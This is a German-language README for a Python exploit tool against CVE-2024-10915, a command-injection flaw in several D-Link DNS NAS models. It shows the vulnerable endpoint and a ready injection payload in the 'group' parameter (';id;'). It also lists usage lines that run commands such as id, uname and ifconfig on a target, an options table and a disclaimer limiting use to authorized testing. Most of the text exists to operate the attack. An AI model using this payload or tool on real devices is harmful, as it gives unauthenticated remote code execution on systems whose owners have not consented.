
Dieser auf Python basierende Exploit zielt auf eine Command-Injection-Schwachstelle in mehreren D-Link-NAS-Produkten über den Endpunkt /cgi-bin/account_mgr.cgi?cmd=cgi_user_add ab. Die Schwachstelle ermöglicht es nicht authentifizierten Angreifern, beliebige Systembefehle auf dem betroffenen Gerät auszuführen.
CVE-2024-10915 betrifft mehrere D-Link-NAS-Modelle. Ein Angreifer kann über den Parameter group im Befehl cgi_user_add Befehle einschleusen, was zu Remote-Codeausführung führt.
D-Link DNS-320
D-Link DNS-320LW
D-Link DNS-325
D-Link DNS-340L
Verwundbarer Endpunkt: /cgi-bin/account_mgr.cgi?cmd=cgi_user_add
http://192.168.1.100/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&group=';id;'
Python 3.x
requests-Bibliothek
Erforderliche Abhängigkeiten installieren:
pip3 install requests
usage: dlink_nas_rce_cve_2024_10915.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-o OUTPUT] [-l]
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "id" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "uname" -p "http://127.0.0.1:8080" -o results.txt
python3 dlink_nas_rce_cve_2024_10915.py -u "http://TARGET_IP" -c "ifconfig" -p "http://127.0.0.1:8080" -o results.txt
Dieses Projekt dient ausschließlich Bildungs- und autorisierten Testzwecken. Verwenden Sie dieses Tool nicht in Netzwerken oder auf Systemen, für die Sie keine ausdrückliche Genehmigung besitzen. Die Autoren übernehmen keinerlei Verantwortung für Missbrauch oder verursachte Schäden.
| Option | Beschreibung |
|---|
-u / --url | Basis-URL des Ziels (z. B. http://192.168.1.100) |
-c / --command | Auf dem Gerät auszuführender Befehl (Standard: id) |
-p / --proxy | HTTP-Proxy verwenden (z. B. http://127.0.0.1:8080) |
-o / --output | HTTP-Antwort in einer Datei speichern |
-l / --list | Betroffene D-Link-NAS-Produkte auflisten |